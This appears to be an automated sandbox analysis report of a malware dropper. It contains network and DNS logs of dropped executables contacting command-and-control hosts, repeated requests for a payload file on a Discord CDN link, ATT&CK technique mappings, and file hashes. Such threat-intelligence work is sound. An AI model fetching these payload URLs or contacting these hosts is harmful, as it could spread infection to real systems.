live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

850 B
1.5kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
185.215.113.15:61506

Wed01033f590d8.exe

260 B
5
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

69.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

69.31.126.40.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

hsiens.xyz

dns

setup_install.exe

56 B
121 B
1
1

DNS Request

hsiens.xyz
8.8.8.8:53

cdn.discordapp.com

dns

Wed01e6754f9438ea6c7.exe

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.129.233

162.159.134.233

162.159.135.233

162.159.133.233

162.159.130.233
8.8.8.8:53

233.129.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.129.159.162.in-addr.arpa
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

pcfixmy-download-96.xyz

dns

dwm.exe

69 B
134 B
1
1

DNS Request

pcfixmy-download-96.xyz
8.8.8.8:53

iplogger.org

dns

dwm.exe

58 B
90 B
1
1

DNS Request

iplogger.org

DNS Response

104.21.4.208

172.67.132.113
8.8.8.8:53

208.4.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

208.4.21.104.in-addr.arpa
8.8.8.8:53

live.goatgame.live

dns

Wed018f781281d3.exe

64 B
163 B
1
1

DNS Request

live.goatgame.live

DNS Response

3.141.96.53

3.20.137.44
8.8.8.8:53

53.96.141.3.in-addr.arpa

dns

70 B
131 B
1
1

DNS Request

53.96.141.3.in-addr.arpa
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

OpPyugYrdcCwUjnxmGFtZLvIhtD.OpPyugYrdcCwUjnxmGFtZLvIhtD

dns

Volevo.exe.com

101 B
176 B
1
1

DNS Request

OpPyugYrdcCwUjnxmGFtZLvIhtD.OpPyugYrdcCwUjnxmGFtZLvIhtD
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

lenak513.tumblr.com

dns

Wed016c6ddb9ad40722.exe

65 B
97 B
1
1

DNS Request

lenak513.tumblr.com

DNS Response

74.114.154.22

74.114.154.18
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

22.154.114.74.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

22.154.114.74.in-addr.arpa
8.8.8.8:53

233.38.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

233.38.18.104.in-addr.arpa
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

aucmoney.com

dns

58 B
131 B
1
1

DNS Request

aucmoney.com
8.8.8.8:53

thegymmum.com

dns

59 B
132 B
1
1

DNS Request

thegymmum.com
8.8.8.8:53

atvcampingtrips.com

dns

65 B
138 B
1
1

DNS Request

atvcampingtrips.com
8.8.8.8:53

kuapakualaman.com

dns

63 B
136 B
1
1

DNS Request

kuapakualaman.com
8.8.8.8:53

renatazarazua.com

dns

63 B
136 B
1
1

DNS Request

renatazarazua.com
8.8.8.8:53

nasufmutlu.com

dns

60 B
133 B
1
1

DNS Request

nasufmutlu.com
8.8.8.8:53

wfsdragon.ru

dns

Wed0187dd5121696b.exe

58 B
90 B
1
1

DNS Request

wfsdragon.ru

DNS Response

172.67.133.215

104.21.5.208
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

215.133.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

215.133.67.172.in-addr.arpa
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com
8.8.8.8:53

s.lletlee.com

dns

Wed01b1b688489137a.exe

59 B
132 B
1
1

DNS Request

s.lletlee.com

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01033f590d8.exe

Filesize
279KB

MD5
af23965c3e2673940b70f436bb45f766

SHA1
ccc8b03ea8c568f1b333458cff3f156898fc29f7

SHA256
e6271d738fc78602abc8916fb4742638b2b4c4205882f6db24eb361694c67503

SHA512
f0202e3ed32b9e69785bb50551b5143fe69298dead3c9a3d539cc6c6768f70f8263f074f912d1de5decb122bc365b7645428c0d10040f6f15a41f3a5ac0a4611

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed0112c658c50.exe

Filesize
152KB

MD5
14f5b34619838749e514ad17e69443ea

SHA1
98e8019077163dc3f42e48c7aba48b312cb6eef7

SHA256
92c43f1a70140426e05b5164d986dca73bf041dc5dae80bd47244cb695d7c0ac

SHA512
4889cb4a7b64fc0536b4de62d5901c526e4a570f40d7c4addeacadb83b89e4284567a3256fd59cca01dbc06a2ebcadaa7ff05fd0573632b23a0a977404d1a162

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed016c6ddb9ad40722.exe

Filesize
557KB

MD5
e8dd2c2b42ddc701b1e2c34cc1fe99b1

SHA1
c3751581986d6cada60747843792d286fd671657

SHA256
835443a1038ad5e0a4dde2451baa95b529f049362955d57daf0b5921729a4f17

SHA512
e179b3b4c2f24d089566630c6ee0421418fe17aa4195dc9b04f471665094ce3a4b3ed29da7b6829b7484fa3e785abd343a1cf7abc556f6f5b5403a92b16a970d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018143c5ab.exe

Filesize
1.4MB

MD5
0191b0583174ce0d1d8dc75601e4d056

SHA1
ec3cbf979a5df64903cb7a825aa640d82075d839

SHA256
01d11314c2c047a01b4159aa32b9afa3f3b7e3fc3b3ea46476c85346f3887949

SHA512
d24f647615a63291854de256e210c6e02f12619f85e694a9027e1969d708c415cf6234a43fae9376bf5788a5f27973ccf159e89b32fc54ab313ba0d720740e70

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018143c5ab.exe

Filesize
1.3MB

MD5
2e5bf220cc46679c1440e7294f5d076c

SHA1
7754d972c67833662b40971b30bdf9b30aefd959

SHA256
5d6c80d950feea1fe4f705c8a9c5d6bcdd19b26419abe58848489dcd3cb82614

SHA512
e39b500e7962d9bbbddd58ada5fabddc3f4cd6e9fbd56e2271ecdc3fbca940fd9804d98502500790e005ac86b8866cfa81de385bb51d0809f3d25a815e36d512

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed0187dd5121696b.exe

Filesize
627KB

MD5
d06aa46e65c291cbf7d4c8ae047c18c5

SHA1
d7ef87b50307c40ffb46460b737ac5157f5829f0

SHA256
1cd9a6908f8a5d58487e6cfea76a388a927f1569ba2b2459f25fffaf8180230f

SHA512
8d5f6605a38e7c45a44127438bf7d6bf6a54aacb0b67b3669eb9609fc1084145f827a8341ce6b1a544198b5633d9f92561bd9f9cc82b52473db0926787a06ea4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed018f781281d3.exe

Filesize
56KB

MD5
c0d18a829910babf695b4fdaea21a047

SHA1
236a19746fe1a1063ebe077c8a0553566f92ef0f

SHA256
78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98

SHA512
cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01b1b688489137a.exe

Filesize
241KB

MD5
5866ab1fae31526ed81bfbdf95220190

SHA1
75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f

SHA256
9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e

SHA512
8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01cc14a7b232c573c.exe

Filesize
196KB

MD5
83a4de9a16c06f9e3f061e299dac5503

SHA1
e4a998f6ab2ed64fa6ef8f099df1e2664d3c50fc

SHA256
2119966414dba3ac3e2e59a069972c6e83a489d9cd9839edf504b8d218844b22

SHA512
099508a9d7d737fcb18e7c80f845a007aeca5bda34bbca34ce766d77df1754334b81f4ae3c22eb65b1344bb5c54454102001ebab1e322276683249464d9fe8c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01e6754f9438ea6c7.exe

Filesize
8KB

MD5
45a47d815f2291bc7fc0112d36aaad83

SHA1
db1dc02b2d64c4c3db89b5df3124dd87d43059d5

SHA256
416e63fb614101d5644592d5f589f358f8d5a41dd6812a717cbf05470864ac6f

SHA512
a7d98145cf949a42ace2da725a22847ad814a28137d32b0b220430b91c89aabed7144b85f20c2fd9a1a02f5b92520bf5f0afbe8202028f9832cbc29c2a9e776e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\libcurl.dll

Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\libcurlpp.dll

Filesize
54KB

MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\libgcc_s_dw2-1.dll

Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\libstdc++-6.dll

Filesize
647KB

MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\libwinpthread-1.dll

Filesize
69KB

MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\setup_install.exe

Filesize
2.1MB

MD5
ab8c6d8384870d4c058fee6a1f11229f

SHA1
dadc56f557979ead34f3508b288ef796f8117a48

SHA256
9248ef64dd344154dea5f1a4dc15833899ba6b6cf66093fe7eb492c25462bfd9

SHA512
5df2c0227d21e03edf198ed45bd86056ab97311dceb2b164a44b9c87b2f044fb92359af866b50d6b4d9f54698dd011c2ca20cc617a7893b4fe56830f1e70d16d

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dal.pdf

Filesize
872KB

MD5
dc93839da6f8254f2fed98f21ac49376

SHA1
2e268097d082e553644ec9c2199439d4b9cd8be9

SHA256
f02919a819d3ca51c845bf3b0226be38d3db28165510bf2c59e180163007aafb

SHA512
d108ee949866790bc176a60b4e7c78765abf7430f2f53c99a0e7a33b90482fd80577668aa3a68e442acf9c48e078d7c6c0eb0f000a6d1afe8c15540aab1259b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dir.pdf

Filesize
734KB

MD5
ac1230d7c753e6debec9a884bb2ecfd0

SHA1
2df95d11d135bba22d58d86e36e91ccd99c17385

SHA256
684b7b246d2800a5d76271243bea29f8177076726ad2c94e99ad9c0feaf1241c

SHA512
0ed20a896078459548f8eafd9e8c1c9b16a1af6112df8d62f212be5a2c5b82f754dbec2ea2ff5e77d5767f45c345ec52156dcf443b1a001f16da033eb05a9d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\H

Filesize
177KB

MD5
cf17a8d4ee84ac1473bd3b2d6cd1c0ed

SHA1
0843e3cbef037160a7bb0f1c5e890450737f607c

SHA256
dec2cd6790a9d36e751a04537ed0574b7b2dbd6c88bf8bd4694281a0d81d708b

SHA512
aceba57b1cf9d69d07429aced03f9005ec2896bd5f34b1202629f3f2a11b8cf949b3d4d56bf8236cc1a96b7ce886ec71e630946095f4273c4222dc0fddb8214b

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vai.pdf

Filesize
510B

MD5
